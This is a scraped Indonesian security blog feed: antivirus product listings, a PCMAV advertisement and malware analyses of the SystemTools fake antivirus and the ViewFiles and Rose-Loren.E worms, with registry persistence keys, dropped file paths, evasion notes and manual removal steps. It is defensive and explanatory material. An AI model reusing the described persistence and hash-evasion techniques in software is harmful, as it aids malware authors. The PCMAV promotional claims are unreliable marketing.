<b>d) Supported OS: </b>XP (32 & 64 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)<br />
<b>e) Price: </b>$ 29.95<br />
>> <a href="http://www.vipreantivirus.com/" target="_blank">Download Vipre Antivirus</a><br />
<br />
<b>10. Trend Micro Titanium Antivirus</b><br />
<div style="text-align: left;"><a href="http://www.info-komputer.tk/wp-content/uploads/2010/10/trend-micro-titanium-antivirus.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="" class="alignleft size-medium wp-image-173" height="221" src="http://www.info-komputer.tk/wp-content/uploads/2010/10/trend-micro-titanium-antivirus-214x300.jpg" title="trend micro titanium antivirus" width="178" /></a><b></b><b> </b><b><span style="text-decoration: underline;">SPESIFIKASI DAN HARGA</span>:</b></div><b>a)</b> <b>Threat Detection</b>: Virus, Worm, Trojan, Spyware, Malware, Rootkit.<br />
<b>b)</b> <b>Additional Protection: </b> OS exploit, Keyloggers, inbound email protection, outbond email protection, instant messaging protection, registry startup protection, dialers, hackers, identity theft protection, adware, activex, vulnerabilities, cookies, scripts, auto usb detect.<br />
<b>c) Protection Technology: </b>Virus signatures, blacklisting, whitelisting, real time, security network.<br />
<b>d) Supported OS: </b>XP (32 bit), Vista (32 & 64 bit), Windows 7 (32 & 64 bit)<br />
<b>e) Price: </b>$ 39.95<br />
<br />
>> <a href="http://apac.trendmicro.com/apac/downloads/smallbusiness/index.html" target="_blank">Download Trend Micro Titanium Antivirus</a><br />
<blockquote><br />
</blockquote><a class="addthis_button" href="http://addthis.com/bookmark.php?v=250"><br />
</a>Rofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0tag:blogger.com,1999:blog-3900150514182505180.post-82660030489447019132011-03-21T01:22:00.000-07:002011-03-21T01:23:29.527-07:00PCMAV dan PC Media<div class="separator" style="clear: both; text-align: center;"><a href="https://lh5.googleusercontent.com/-ZsPuabaDIM8/TYcKdTrkOLI/AAAAAAAAAKo/jZoxlAqIHBI/s1600/pcmav.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="155" src="https://lh5.googleusercontent.com/-ZsPuabaDIM8/TYcKdTrkOLI/AAAAAAAAAKo/jZoxlAqIHBI/s320/pcmav.jpg" width="320" /></a></div><div style="text-align: justify;"><b> PC Media Antivirus</b> (PCMAV) merupakan satu-satunya antivirus di dunia yang mengandung formula dan teknologi khusus yang unik dan tangguh untuk mengatasi virus komputer yang menyebar luas di Indonesia, baik jenis lokal maupun mancanegara (asing), secara akurat dan tuntas hingga pulih 100%.</div><div style="text-align: justify;">Berbeda dengan antivirus sejenis, setiap virus yang ada di database PCMAV masing-masing memiliki <i>removal engine</i>-nya sendiri, sehingga virus dapat dibasmi dan dibersihkan secara tuntas hingga ke “akar-akarnya” tanpa kompromi! Removal engine ini juga dirancang untuk bekerja secara hati-hati dan dengan tingkat keamanan yang sangat tinggi, tujuannya agar sistem/file/dokumen penting Anda yang terserang virus dapat dipulihkan secara sempurna tanpa khawatir risiko kehilangan atau kerusakan pada file/sistem. Silahkan buktikan sendiri keampuhan removal engine PCMAV dengan antivirus yang biasa Anda gunakan.</div><div></div><div style="text-align: justify;"><a href="https://lh4.googleusercontent.com/-9QuWbxK2PmY/TYcKHEY4XrI/AAAAAAAAAKk/TqaX97RGae4/s1600/PC+mav.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://lh4.googleusercontent.com/-9QuWbxK2PmY/TYcKHEY4XrI/AAAAAAAAAKk/TqaX97RGae4/s1600/PC+mav.jpg" /></a>Selain menggunakan <i>engine</i> antivirus-nya sendiri, PCMAV juga dapat menggunakan <i>engine</i> dari <a href="http://www.clamav.net/" target="_blank" title="ClamAV">ClamAV</a> sebagai <i>plug-in</i> untuk memperkuat hasil pendeteksian hingga 700.000 virus lebih. Tim <i>engineer</i> PCMAV pun secara meyakinkan berhasil menemukan dan mengembangkan sendiri berbagai teknologi antivirus baru nan-handal untuk mengatasi dan menjaga sistem Anda dari gangguan virus komputer.</div><div style="text-align: justify;"></div><div style="text-align: justify;">Dikembangkan secara intensif oleh <i><a href="http://www.pcmedia.co.id/" target="_blank" title="PC Media">PC Media</a></i>, majalah komputer terbesar dan terlaris di Indonesia, serta didukung luasnya jaringan distribusi Pinpoint Publications, PCMAV telah dipercaya oleh ratusan ribu komputer pembaca setia dan pecinta majalah <i>PC Media</i> di nusantara. Ini belum termasuk pengguna yang mempercayai PCMAV di luar pembaca <i>PC Media</i> yang bebas menggunakan PCMAV, yang kami duga jumlahnya mencapai jutaan komputer di Indonesia.</div><div style="text-align: justify;"></div><div style="text-align: justify;">Jadi, mulai sekarang, percayakan selalu penanganan virus, worm maupun trojan yang menyerang komputer Anda hanya kepada PCMAV. Dapatkan versi terbarunya hanya di majalah <i>PC Media</i> edisi terbaru, terbit tiap bulan. </div>Rofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0tag:blogger.com,1999:blog-3900150514182505180.post-56002490169773456702011-03-21T00:53:00.000-07:002011-03-21T00:53:23.033-07:00SystemTools: Remove All Spyware from Your PC<div class="info"> <span class="date"></span><span class="comments"><a href="http://virusindonesia.com/2011/03/16/systemtools-remove-all-spyware-from-your-pc/#comments"></a></span> </div><img alt="SystemTools" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/SystemTools_1.PNG" title="SystemTools" width="450/" /><br />
<strong>SystemTools.</strong> Beberapa hari yang lalu, sebagian user di kagetkan dengan adanya aplikasi SystemTools yang tanpa mereka sadari aplikasi tersebut adalah “FakeAntivirus” atau “Antivirus Palsu”. Malware sejenis pernah di bahas pada postingan sebelumnya yang berjudul <a href="http://virusindonesia.com/2011/01/04/fakeav-downloader-g-serangan-antivirus-palsu/" target="_blank">FakeAV-Downloader.G</a>. Laporan di dapat dari user yang mendownload salah satu antivirus lokal dari website resminya yang kemudian justru menjalankan antivirus palsu.<br />
<span id="more-1515"></span><br />
<strong>A. Info Malware</strong><br />
Nama: SystemTools<br />
Asal: Belum diketahui<br />
Ukuran File: 397 KB (407,040 bytes)<br />
Packer: -<br />
Pemrograman: Visual C++<br />
Icon: Random<br />
Tipe: Trojan<br />
<strong>B. Tentang Malware</strong><br />
Awalnya, kami mendapat laporan mengenai user yang mendapat pesan di Facebook dan isinya adalah sebuah link yang jika dibuka maka akan mendownload sebuah file dengan nama surprise.exe. Setelah file tersebut di jalankan, user merasakan keanehan yang terjadi pada komputernya. Contohnya seperti Firefox tidak bisa di buka, juga Task Manager dan beberapa file aplikasi lainnya.<br />
Selain beberapa aplikasi tidak bisa di buka, wallpaper pada desktop komputer user berubah seperti pada gambar berikut.<br />
<img alt="Wallpaper SystemTools" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/SystemTools_8.png" title="Wallpaper SystemTools" width="450/" /><br />
Malware tipe Trojan ini mengingatkan kita pada salah satu virus yang sempat menghebohkan Indonesia yaitu Windx-Maxtrox pada tahun 2008 yang juga mengubah desktop. Kesuksesan SystemTools ini menyebar di indonesia adalah:<br />
1. Menyebar melalui Facebook dan salah satu website yang menyediakan fasilitas download gratis.<br />
2. Pada saat pengguna mengunduh SystemTools ini dari Internet, beberapa antivirus luar negeri belum ada yang mendeteksinya sebagai malware.<br />
<img alt="Exeinfo PE" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/SystemTools_3.PNG" title="Exeinfo PE" width="450/" /><br />
Dibuat menggunakan C++ tanpa di-pack, malware ini juga memiliki keistimewaan lain. Yaitu kemampuan untuk merubah <em>DateTimeStamp </em> pada informasi headernya. Sehingga hash MD5nya selalu berubah meskipun ukuran filenya sama.<br />
<img alt="DateTimeStamp" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/SystemTools_4.PNG" title="DateTimeStamp" width="450/" /><br />
Harga antivirus palsu ini juga tidak tanggung-tanggung.<br />
1 tahun lisensi: $ 59.95<br />
2 tahun lisensi: $ 69.95<br />
Lifetime lisensi: $ 79.95<br />
Lifetime premium support: $ 19.95<br />
<strong>C. Companion/File yang dibuat</strong><br />
Setelah aktif di memory, system tools akan membuat beberapa file seperti:<br />
1. Membuat file <em>[nama acak].tmp</em> yang sebenarnya adalah file gambar (BMP / Bitmap) dan nantinya akan dijadikan wallpaper dekstop pada folder <em>C:\Documents and Settings\[nama user]\Local Settings\Temp<br />
</em><br />
2. Membuat file yang akan di jalankan setelah startup dengan nama acak dan file lain tanpa ekstensi pada folder <em>C:\Documents and Settings\All Users\Application Data\[folder dengan nama acak]</em><br />
<strong>D. Hasil Infeksi</strong><br />
Setelah aktif di memory, malware ini akan memblok setiap file aplikasi, kecuali file dengan nama file system seperti pada gambar di bawah:<br />
<img alt="Aplikasi yang di-blok" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/SystemTools_5.PNG" title="Aplikasi yang di-blok" /><br />
Malware juga memunculkan pesa-pesan palsu seperti gambar berikut:<br />
<img alt="False Warning 1" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/SystemTools_6.PNG" title="False Warning 1" /><br />
<img alt="False Warning 2" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/SystemTools_7.PNG" title="False Warning 2" /><br />
Selain menampilkan wallpaper yang berubah seperti yang telah ditampilkan sebelumnya, malware juga terkadang menampilkan pesan Blue Screen Of Death (BSOD) yang menandakan seolah olah sistem komputer sudah benar-benar rusak.<br />
<img alt="BSOD" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/SystemTools_9.png" title="BSOD" /><br />
Memaksa user untuk melakukan registrasi agar mendapatkan kode aktivasi dan membersihkan semua malware yang di laporkan oleh SystemTools.<br />
<img alt="Activation" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/SystemTools_10.PNG" title="Activation" /><br />
Agar bisa berjalan saat startup, SystemTools membuat value registry baru di:<br />
<em>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\[nama acak], “C:\Documents and Settings\All Users\Application Data\[nama folder aca]\[nama acak].exe”</em><br />
<strong>E. Pembersihan</strong><br />
Untuk pembersihan, dapat dilakukan dengan 2 cara. Yaitu dengan cara manual dan cara langsung menggunakan PCMAV.<br />
<strong>Cara manual:</strong><br />
1.Cari file task manager (taskmgr.exe) yang terdapat pada folder<br />
<em>C:\WINDOWS\system32\taskmgr.exe</em><br />
<img alt="Step 1" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/Step1.PNG" title="Step 1" width="450/" /><br />
2.Copy file tersebut ke <em>My Documents</em>, dengan klik kanan lalu pilih menu<br />
<em>Send to My Documents</em>.<br />
3.Buka folder <em>My Documents</em>, kemudian Rename file “taskmgr.exe” menjadi “Explorer.exe” dan jalankan file tersebut, maka akan tampil Task Manager.<br />
<img alt="Step 2" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/Step2.PNG" title="Step 2" width="450/" /><br />
4.Cari proses dengan nama aneh misalnya “eImHbDk02400.exe” kemudian kill proses tersebut (End Process).<br />
<img alt="Step 3" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/Step3.PNG" title="Step 3" /><br />
5.Buka Windows Explorer, aktifkan fungsi “Show Hidden Files and Folders” pada “Folder Options” dengan memilih menu <em>Tools – Folder Options – View</em>, pilih <em>Show Hidden Files and Folders</em>, lalu klik OK.<br />
<img alt="Step 4" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/Step4.PNG" title="Step 4" /><br />
6. Masuk ke folder “<em>C:\Documents and Settings\All Users\Application Data</em>” cari dan hapus folder dengan nama aneh, misalnya “eImHbDk02400″ yang di dalamnya terdapat file dari SystemTools.<br />
<img alt="Step 5" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/Step5.PNG" title="Step 5" /><br />
7. (Opsional, jika boleh dilakukan atau tidak masalah jika tidak dilakukan) Masuk ke folder “<em>C:\Documents and Settings\[nama user]\Local Settings\Temp</em>“, cari dan hapus file Temporary (tmp) yang ukurannya tidak wajar (2MB ~ ) karena file tersebut adalah file bitmap yang dijadikan wallpaper pada desktop user yang terinfeksi.<br />
<img alt="Step 6" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/Step6.PNG" title="Step 6" width="450/" /><br />
8.Aktifkan Kembalikan fungsi “<em>Do not show hidden files and folders</em>“.<br />
Pilih menu <em>Tools – Folder Options – View</em>, pilih “<em>Do not show hidden files and folders</em>“, dan klik OK.<br />
<img alt="Step 7" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/Step7.PNG" title="Step 7" /><br />
9.<em>Log Off </em>Komputer.<br />
10.Komputer kembali normal.<br />
<strong>Pembersihan menggunakan PCMAV:</strong><br />
Jalankan PCMAV dan scan seperti biasa dan lakukan scan menyeluruh.<br />
<img alt="Deteksi" src="http://virusindonesia.com/wp-content/uploads/2011/03/systemtools/deteksi.png" title="Deteksi" /><br />
<strong>PCMAV 4.7 Update Build3</strong><br />
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 4.7 Update Build3 telah hadir dengan penambahan <strong>120 </strong> pengenal varian virus baru. Bagi Anda pengguna PCMAV 4.7, sangat disarankan segera melakukan <em>update</em>, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.<img alt="" src="http://virusindonesia.com/2011/03/16/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" title="More..." /><img alt="" src="http://virusindonesia.com/2011/03/16/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" title="More..." /><br />
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan <em>proxy</em>, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih <em>Update</em>.<br />
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:<br />
<a href="http://www.sendspace.com/file/8rmxkl" target="_blank" title="SendSpace.com">SendSpace.com</a><br />
<a href="http://www13.zippyshare.com/v/58461593/file.html" target="_blank" title="ZippyShare.com">ZippyShare.com</a> (mirror)<br />
<a href="http://rapidshare.com/files/451984494/update.vdb" target="_blank" title="Rapidshare.com">Rapidshare.com</a> (mirror)<br />
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup <strong>menimpanya</strong>. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.<br />
<strong>Daftar tambahan virus hingga PCMAV 4.7 Update Build3:</strong><br />
Aksika-Indramayu<br />
Aksika-Indramayu.txt<br />
AlamarPica.vbs<br />
Angelo.G<br />
Angelo.G.host<br />
AnitaLoroaji<br />
AnitaLoroaji.inf<br />
Autoit-Arif<br />
Autoit-Cyrillic<br />
Autoit-ReplaceIcon.D<br />
Autoit-ReplaceIcon.E<br />
Autoit-ReplaceIcon.F<br />
Autoit.FD<br />
Autoit.FD.ini<br />
Autoit.FE<br />
Autoit.FE.serv<br />
Bajigur.vbs<br />
Bajigur.vbs.bat<br />
Bajigur.vbs.host<br />
Bajigur.vbs.inf<br />
Bali.B<br />
Batam<br />
Batam-BlackRider<br />
Batam-BlackRider.inf<br />
Batam.inf<br />
BlackLove.E<br />
CintaFitri.B<br />
CintaFitri.B.inf<br />
Cobax.exe.C<br />
CoolStory<br />
DarkWar<br />
Dhoos<br />
Dhoos.dll<br />
Dhoos.url.A<br />
Dhoos.url.B<br />
Dhoos.url.C<br />
DirLock.C<br />
DirLock.C.host<br />
Enigma<br />
FakeAV<br />
FakeAV-Downloader.K<br />
FakeAV-Downloader.K.dat<br />
FakeAV-Downloader.K.dll.A<br />
FakeAV-Downloader.K.dll.B<br />
FakeAV-Downloader.K.dll.C<br />
FakeAV-Downloader.K.job<br />
FakeAV-Downloader.K.lnk.A<br />
FakeAV-Downloader.K.lnk.B<br />
FakeAV-Downloader.K.lnk.C<br />
FakeAV-Downloader.K.lnk.D<br />
FakeAV-Downloader.K.ref<br />
FakeAV-Downloader.K.rtf<br />
FakeAV-Downloader.K.setup<br />
FakeAV-Downloader.K.unins<br />
FakeAV-Downloader.K.url<br />
Fakhricker.vbs<br />
FeSilva.vbs<br />
FeSilva.vbs.inf<br />
FnI-DiaryMimi.vbs<br />
FnI-DiaryMimi.vbs.inf<br />
Gabest.B<br />
GavGent-HVM31<br />
GrepoZipTsunami.vbs<br />
GrepoZipTsunami.vbs.inf<br />
GXRG-Snow.vbs<br />
GXRG-Snow.vbs.host<br />
GXRG-Snow.vbs.inf<br />
GXRG.vbs<br />
GXRG.vbs.inf<br />
H323<br />
H323.bat<br />
Halted<br />
IsroCiremai<br />
IyanHapacker<br />
JonBennett<br />
JonBennett.inf<br />
KefiUnique.vbs<br />
KefiUnique.vbs.txt<br />
KefiUnique.vbs.upd<br />
Lz32.vbs.B<br />
Lz32.vbs.C<br />
Ossep.vbs<br />
Ossep.vbs.inf<br />
RadimPicha<br />
RadimPicha.dll<br />
RadimPicha.inf<br />
RadimPicha.pass<br />
Ramnit.A.Variant<br />
Ramnit.B.Variant<br />
Ramnit.C.Variant<br />
Ramnit.D.Variant<br />
Ramnit.E.Variant<br />
Ramnit.F.variant<br />
Recycler.BO<br />
Recycler.BO.dll<br />
Ronkor.C<br />
Ronkor.C.htt<br />
Ronkor.C.txt<br />
Rose-Loren.E<br />
Serviks.vbs.C<br />
Serviks.vbs.C.doc<br />
Serviks.vbs.C.host<br />
SystemTools<br />
Temps<br />
Temps.INF<br />
TripleExe<br />
TripleExe.inf<br />
VB-Shortcut-1.lnk<br />
VBVN<br />
ViewFiles<br />
XSample.vbs<br />
XSample.vbs.inf<br />
XSample.vbs.ini<br />
XSample.vbs.lnk.A<br />
XSample.vbs.lnk.B<br />
XSample.vbs.lnk.C<br />
XSample.vbs.lnk.D<br />
XSample.vbs.lnk.E<br />
XSample.vbs.lnk.F<br />
XSample.vbs.mp3Rofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0tag:blogger.com,1999:blog-3900150514182505180.post-1020502081780855762011-03-21T00:51:00.001-07:002011-03-21T00:51:37.478-07:00ViewFiles: ALABAMA<div class="info"> <span class="date"></span><span class="comments"><a href="http://virusindonesia.com/2011/03/07/viewfiles-alabama/#comments"></a></span> </div><img alt="ViewFile" src="http://virusindonesia.com/wp-content/uploads/2011/03/viewfiles.PNG" title="ViewFile" /><br />
<strong>Alabama.</strong> Awalnya kami pikir ini hanyalah worm yang sama seperti VB-Shortcut karena menggunakan icon standar aplikasi Visual Basic. Namun setelah kami coba melakukan analisa lebih jauh, rupanya karakteristik worm ini berbeda dengan VB-Shortcut. Terdapat string “ALABAMA” yang terdapat dalam tubuh worm ViewFiles. Apakah mengindikasikan worm ini berasal dari Alabama?<br />
<span id="more-1498"></span><br />
<strong>A. Info Malware</strong><br />
Nama: ViewFiles<br />
Asal: kemungkinan dari Alabama<br />
Ukuran File: 168 KB (172,032 bytes)<br />
Packer : -<br />
Pemrograman : Visual Basic<br />
Icon : Aplikasi Visual Basic<br />
Tipe : Worm<br />
<strong>B. Tentang Malware</strong><br />
Selain shortcut yang sedang ramai dibuat oleh beberapa worm belakangan ini, icon aplikasi Visual Basic juga menjadi salah satu ciri worm yang mulai banyak di laporkan sejak Agustus 2010 kemarin. Begitu juga yang dilakukan olah pembuat worm ViewFiles. Namanya diambil dari nama induknya yang menyebar di flash disk dan diberi nama ViewFiles.exe.<br />
<strong>C. Companion/File yang dibuat</strong><br />
Pada komputer yang terinfeksi, worm ViewFiles akan membuat file autorun dan file companion pada flash disk yang nantinya akan di panggil oleh autorun.<br />
<img alt="Induk ViewFile" src="http://virusindonesia.com/wp-content/uploads/2011/03/files.PNG" title="Induk ViewFile" /><br />
Isi dari autorun akan selalu berubah seperti contoh di bawah ini, hal ini di maksudkan untuk mengecoh pendeteksian oleh antivirus akan tetapi beberapa penting bagian tidak pernah dirubah oleh worm ini.<br />
<img alt="Autorun ViewFile" src="http://virusindonesia.com/wp-content/uploads/2011/03/autorun.PNG" title="Autorun ViewFile" /><br />
<strong>D. Hasil Infeksi</strong><br />
Worm ViewFiles akan bersembunyi di dalam folder RECYCLER dan membuat folder yang hampir sama seperti isi folder RECYCLER seperti gambar di bawah.<br />
<img alt="ViewFile" src="http://virusindonesia.com/wp-content/uploads/2011/03/ViewFile.png" title="ViewFile" /><br />
Agar bisa berjalan saat startup, worm ini membuat key dengan nama Taksman pada:<br />
<em><br />
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman<br />
</em><br />
<img alt="Startup" src="http://virusindonesia.com/wp-content/uploads/2011/03/startup.PNG" title="Startup" /><br />
<strong>E. Pembersihan</strong><br />
Mulai PCMAV 4.7 Update Build2, ViewFiles beserta file-file companionnya telah dapat dikenali dan dibersihkan dari sistem komputer Anda.<br />
<img alt="Detected" src="http://virusindonesia.com/wp-content/uploads/2011/03/ViewFile3.PNG" title="Detected" /><br />
<strong>PCMAV 4.7 Update Build2</strong><br />
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 4.7 Update Build2 telah hadir dengan penambahan <strong>98 </strong> pengenal varian virus baru. Bagi Anda pengguna PCMAV 4.7, sangat disarankan segera melakukan <em>update</em>, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.<img alt="" src="http://virusindonesia.com/2011/03/07/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" title="More..." /><img alt="" src="http://virusindonesia.com/2011/03/07/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" title="More..." /><br />
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan <em>proxy</em>, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih <em>Update</em>.<br />
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:<br />
<a href="http://www.sendspace.com/file/1twjwj" target="_blank" title="SendSpace.com">SendSpace.com</a><br />
<a href="http://www64.zippyshare.com/v/31263177/file.html" target="_blank" title="ZippyShare.com">ZippyShare.com</a> (mirror)<br />
<a href="http://rapidshare.com/files/451328327/update.vdb" target="_blank" title="Rapidshare.com">Rapidshare.com</a> (mirror)<br />
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup <strong>menimpanya</strong>. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.<br />
<strong>Daftar tambahan virus hingga PCMAV 4.7 Update Build2:</strong><br />
Aksika-Indramayu<br />
Aksika-Indramayu.txt<br />
AlamarPica.vbs<br />
Angelo.G<br />
Angelo.G.host<br />
AnitaLoroaji<br />
AnitaLoroaji.inf<br />
Autoit-Arif<br />
Autoit-Cyrillic<br />
Autoit-ReplaceIcon.D<br />
Autoit-ReplaceIcon.E<br />
Autoit-ReplaceIcon.F<br />
Autoit.FD<br />
Autoit.FD.ini<br />
Autoit.FE<br />
Autoit.FE.serv<br />
Batam<br />
Batam.inf<br />
Cobax.exe.C<br />
Dhoos<br />
Dhoos.dll<br />
Dhoos.url.A<br />
Dhoos.url.B<br />
Dhoos.url.C<br />
DirLock.C<br />
DirLock.C.host<br />
FakeAV<br />
FakeAV-Downloader.K<br />
FakeAV-Downloader.K.dat<br />
FakeAV-Downloader.K.dll.A<br />
FakeAV-Downloader.K.dll.B<br />
FakeAV-Downloader.K.dll.C<br />
FakeAV-Downloader.K.job<br />
FakeAV-Downloader.K.lnk.A<br />
FakeAV-Downloader.K.lnk.B<br />
FakeAV-Downloader.K.lnk.C<br />
FakeAV-Downloader.K.lnk.D<br />
FakeAV-Downloader.K.ref<br />
FakeAV-Downloader.K.rtf<br />
FakeAV-Downloader.K.setup<br />
FakeAV-Downloader.K.unins<br />
FakeAV-Downloader.K.url<br />
Fakhricker.vbs<br />
FeSilva.vbs<br />
FeSilva.vbs.inf<br />
FnI-DiaryMimi.vbs<br />
FnI-DiaryMimi.vbs.inf<br />
Gabest.B<br />
GavGent-HVM31<br />
GrepoZipTsunami.vbs<br />
GrepoZipTsunami.vbs.inf<br />
GXRG-Snow.vbs<br />
GXRG-Snow.vbs.host<br />
GXRG-Snow.vbs.inf<br />
GXRG.vbs<br />
GXRG.vbs.inf<br />
H323<br />
H323.bat<br />
Halted<br />
KefiUnique.vbs<br />
KefiUnique.vbs.txt<br />
KefiUnique.vbs.upd<br />
Lz32.vbs.B<br />
Lz32.vbs.C<br />
Ossep.vbs<br />
Ossep.vbs.inf<br />
Ramnit.A.Variant<br />
Ramnit.B.Variant<br />
Ramnit.C.Variant<br />
Ramnit.D.Variant<br />
Ramnit.E.Variant<br />
Ramnit.F.variant<br />
Recycler.BO<br />
Recycler.BO.dll<br />
Ronkor.C<br />
Ronkor.C.htt<br />
Ronkor.C.txt<br />
Rose-Loren.E<br />
Serviks.vbs.C<br />
Serviks.vbs.C.doc<br />
Serviks.vbs.C.host<br />
Temps<br />
Temps.INF<br />
TripleExe<br />
TripleExe.inf<br />
VB-Shortcut-1.lnk<br />
VBVN<br />
ViewFiles<br />
XSample.vbs<br />
XSample.vbs.inf<br />
XSample.vbs.ini<br />
XSample.vbs.lnk.A<br />
XSample.vbs.lnk.B<br />
XSample.vbs.lnk.C<br />
XSample.vbs.lnk.D<br />
XSample.vbs.lnk.E<br />
XSample.vbs.lnk.F<br />
XSample.vbs.mp3Rofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0tag:blogger.com,1999:blog-3900150514182505180.post-55859664446788987422011-03-21T00:49:00.000-07:002011-03-21T00:49:07.220-07:00Virus Lokal Rose-Loren.E:"Rose' Ada karena 'Cinta'<img alt="Rose-Loren.E" src="http://virusindonesia.com/wp-content/uploads/2011/02/rose-loren/1.pesan.PNG" title="Rose-Loren.E" /><br />
<strong>Rose-Loren.E.</strong> Tidak selamanya dunia malware itu terkesan hitam dan jahat. Karena Rose-Loren dan salah satu variannya yang di bahas kali ini lebih mengesankan kepiluan serta rasa kesedihan yang dirasakan oleh pembuatnya. Jika bunga mawar umumnya mencirikan perasaan cinta, Rose-Loren membuat bunga mawar sebagai tanda kedatangannya.<br />
<span id="more-1482"></span><br />
<strong>A. Info Malware</strong><br />
Nama: Rose-Loren.E<br />
Asal: Indonesia<br />
Ukuran File: 91.7 KB (93,961 bytes)<br />
Packer : Unknown<br />
Pemrograman : Visual Basic<br />
Icon : Folder Windows<br />
Tipe : Worm<br />
<strong>B. Tentang Malware</strong><br />
Sepertinya ini adalah hasil dari modifikasi dari source terdahulu karena sudah cukup lama kami mendapatkan variant dari Rose-Loren. eSetelah di unpack, worm ini berukuran 216 KB (221,696 bytes). Saat worm ini aktif di memory, komputer akan terasa lambat karena proses Rose-Loren.E menyita resource yang cukup besar.<br />
<strong>C. Companion/File yang dibuat</strong><br />
Saat aktif, worm akan mencari setiap drive yang ditemukan dan membuat file/folder antara lain sebagai berikut:<br />
<ul><li> Membuat file yang merupakan file induk/host dari worm, yaitu<br />
C:\WINDOWS\system32\[5 buah bilangan acak]\lsass.exe dan<br />
C:\WINDOWS\system32\[5 buah bilangan acak]\svchost.exe</li>
<li> Membuat juga file dengan nama EpIoler dan autoexec.bat di folder yang sama seperti di atas, dan isinya adalah:<br />
<div><div class="syntaxhighlighter plain" id="highlighter_568951"><div class="toolbar"><span><a class="toolbar_item command_help help" href="http://virusindonesia.com/2011/02/24/rose-loren-e-rose-ada-karena-cinta/#">?</a></span></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div><div class="line number2 index1 alt1">2</div><div class="line number3 index2 alt2">3</div><div class="line number4 index3 alt1">4</div><div class="line number5 index4 alt2">5</div><div class="line number6 index5 alt1">6</div><div class="line number7 index6 alt2">7</div><div class="line number8 index7 alt1">8</div><div class="line number9 index8 alt2">9</div><div class="line number10 index9 alt1">10</div><div class="line number11 index10 alt2">11</div><div class="line number12 index11 alt1">12</div><div class="line number13 index12 alt2">13</div><div class="line number14 index13 alt1">14</div><div class="line number15 index14 alt2">15</div><div class="line number16 index15 alt1">16</div><div class="line number17 index16 alt2">17</div><div class="line number18 index17 alt1">18</div><div class="line number19 index18 alt2">19</div><div class="line number20 index19 alt1">20</div><div class="line number21 index20 alt2">21</div><div class="line number22 index21 alt1">22</div><div class="line number23 index22 alt2">23</div><div class="line number24 index23 alt1">24</div><div class="line number25 index24 alt2">25</div><div class="line number26 index25 alt1">26</div><div class="line number27 index26 alt2">27</div><div class="line number28 index27 alt1">28</div><div class="line number29 index28 alt2">29</div><div class="line number30 index29 alt1">30</div><div class="line number31 index30 alt2">31</div><div class="line number32 index31 alt1">32</div><div class="line number33 index32 alt2">33</div><div class="line number34 index33 alt1">34</div><div class="line number35 index34 alt2">35</div><div class="line number36 index35 alt1">36</div><div class="line number37 index36 alt2">37</div><div class="line number38 index37 alt1">38</div><div class="line number39 index38 alt2">39</div><div class="line number40 index39 alt1">40</div><div class="line number41 index40 alt2">41</div><div class="line 